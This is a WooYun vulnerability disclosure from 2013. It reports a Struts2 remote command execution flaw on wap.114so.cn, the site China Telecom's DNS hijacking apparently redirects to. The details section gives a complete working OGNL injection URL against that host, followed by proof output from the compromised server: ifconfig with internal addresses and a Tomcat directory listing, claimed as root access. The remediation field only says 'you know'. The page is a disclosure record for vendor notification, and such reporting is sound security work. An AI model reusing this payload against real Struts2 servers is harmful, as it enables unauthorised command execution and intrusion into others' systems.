当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036491

漏洞标题:电信DNS劫持跳转的站点存在Struts2远程命令执行漏洞

相关厂商:中国电信

漏洞作者: 超威蓝猫

提交时间:2013-09-08 20:27

修复时间:2013-10-23 20:28

公开时间:2013-10-23 20:28

漏洞类型:系统/服务补丁不及时

危害等级:中

自评Rank:7

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-08: 细节已通知厂商并且等待厂商处理中
2013-09-12: 厂商已经确认,细节仅向厂商公开
2013-09-22: 细节向核心白帽子及相关领域专家公开
2013-10-02: 细节向普通白帽子公开
2013-10-12: 细节向实习白帽子公开
2013-10-23: 细节向公众公开

简要描述:

哈哈哈电信喜欢劫持到114so.cn啊哈哈哈哈哈哈哈哈哈哈[拜拜]

详细说明:

http://wap.114so.cn/search.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(@java.lang.System@getProperty(%22user.name%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))


root权限

2323.png


$4TT[`@T0BMR[N)`59D[]_4.jpg

漏洞证明:

ifconfig

bond0     Link encap:Ethernet  HWaddr 6C:3B:E5:AA:9F:C8  
          inet addr:192.168.89.44  Bcast:192.168.89.255  Mask:255.255.255.0
          inet6 addr: fe80::6e3b:e5ff:feaa:9fc8/64 Scope:Link
          UP BROADCAST RUNNING MASTER MULTICAST  MTU:1500  Metric:1
          RX packets:8673674371 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7761053255 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:6164307216008 (5.6 TiB)  TX bytes:5013164549043 (4.5 TiB)
eth0      Link encap:Ethernet  HWaddr 6C:3B:E5:AA:9F:C8  
          UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:8672454366 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7761053254 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:6164228630768 (5.6 TiB)  TX bytes:5013164548949 (4.5 TiB)
          Interrupt:139 Memory:fc000000-fc7fffff 
eth1      Link encap:Ethernet  HWaddr 6C:3B:E5:AA:9F:C8  
          UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:1220005 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:78585240 (74.9 MiB)  TX bytes:94 (94.0 b)
          Interrupt:92 Memory:fa800000-faffffff 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1907213 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1907213 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:343689004 (327.7 MiB)  TX bytes:343689004 (327.7 MiB)


ls -l

?? 1232
drwxr-xr-x 2 root root   4096 03-26 11:16 2b
-rw-r--r-- 1 root root   6279 03-26 11:16 3
drwxr-xr-x 2 root root   4096 03-26 11:16 4b
-rw-r--r-- 1 root root  22705 03-26 11:16 bootstrap.jar
-rw-r--r-- 1 root root  11830 03-26 11:16 catalina.bat
-rwxr-xr-x 1 root root  17877 03-26 11:16 catalina.sh
-rwxr-xr-x 1 root root  17880 03-26 11:16 catalina.sh.bak20120601
-rw-r--r-- 1 root root   2374 03-26 11:16 catalina-tasks.xml
-rw-r--r-- 1 root root  24172 03-26 11:16 commons-daemon.jar
-rw-r--r-- 1 root root 199623 03-26 11:16 commons-daemon-native.tar.gz
-rw-r--r-- 1 root root   1342 03-26 11:16 cpappend.bat
-rw-r--r-- 1 root root   8212 07-31 15:28 crontab -l
-rw-r--r-- 1 root root   2108 03-26 11:16 digest.bat
-rwxr-xr-x 1 root root   1689 03-26 11:16 digest.sh
-rw-r--r-- 1 root root  21946 03-26 11:16 forward.jsp
-rw-r--r-- 1 root root  64029 03-26 11:16 hs_err_pid21298.log
-rw-r--r-- 1 root root  10250 03-26 11:16 index1.jsp
-rw-r--r-- 1 root root  10262 03-26 11:16 index1.jsp.1
-rw-r--r-- 1 root root  10250 03-26 11:16 index1.jsp.2
-rw-r--r-- 1 root root  10249 03-26 11:16 index1.jsp.3
-rw-r--r-- 1 root root  16731 03-26 11:16 index2.jsp
-rw-r--r-- 1 root root  16722 03-26 11:16 index2.jsp.1
-rw-r--r-- 1 root root  16731 03-26 11:16 index2.jsp.2
-rw-r--r-- 1 root root  16737 03-26 11:16 index2.jsp.3
-rw-r--r-- 1 root root  16737 03-26 11:16 index2.jsp.4
-rw-r--r-- 1 root root  16749 03-26 11:16 index2.jsp.5
-rw-r--r-- 1 root root  16737 03-26 11:16 index2.jsp.6
-rw-r--r-- 1 root root  16743 03-26 11:16 index2.jsp.7
-rw-r--r-- 1 root root  16731 03-26 11:16 index2.jsp.8
-rw-r--r-- 1 root root  11464 03-26 11:16 index2.jsp?ua=
-rw-r--r-- 1 root root   6039 03-26 11:16 index.html
-rw-r--r-- 1 root root   1153 03-26 11:16 index.html.1
-rw-r--r-- 1 root root    757 03-26 11:16 robot.txt
-rw-r--r-- 1 root root    757 03-26 11:16 robot.txt.1
-rw-r--r-- 1 root root   8762 03-26 11:16 search.php?vt=3
-rw-r--r-- 1 root root   3150 03-26 11:16 setclasspath.bat
-rwxr-xr-x 1 root root   4114 03-26 11:16 setclasspath.sh
-rw-r--r-- 1 root root   2108 03-26 11:16 shutdown.bat
-rwxr-xr-x 1 root root   1628 03-26 11:16 shutdown.sh
-rw-r--r-- 1 root root   2109 03-26 11:16 startup.bat
-rwxr-xr-x 1 root root   2074 03-26 11:16 startup.sh
-rw-r--r-- 1 root root  32277 03-26 11:16 tomcat-juli.jar
-rw-r--r-- 1 root root 249259 03-26 11:16 tomcat-native.tar.gz
-rw-r--r-- 1 root root   3479 03-26 11:16 tool-wrapper.bat
-rwxr-xr-x 1 root root   3472 03-26 11:16 tool-wrapper.sh
-rw-r--r-- 1 root root   2113 03-26 11:16 version.bat
-rwxr-xr-x 1 root root   1632 03-26 11:16 version.sh
-rw-r--r-- 1 root root   5750 03-26 11:16 ViewProductList.aspx?columntype=fenlei&productListId=1082

修复方案:

你懂

版权声明:转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-09-12 23:33

厂商回复:

最新状态:

暂无